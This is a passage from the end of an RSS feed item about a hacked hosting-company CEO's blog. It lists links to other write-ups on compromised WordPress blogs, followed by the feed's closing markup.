<li><a href="http://blog.kakkoi.net/uri/d3d3Lm11cnJheWMuY29tL2Jsb2cvcGVybWFsaW5rLzIwMDcvMTEvMTYvbXktd29yZHByZXNzLWNyYWNrZWQv.curie,80,302" rel="external nofollow robots-nofollow" rev="wordpress:hacked" title="My Wordpress Cracked">Murray&#8217;s Blog My Wordpress Cracked</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
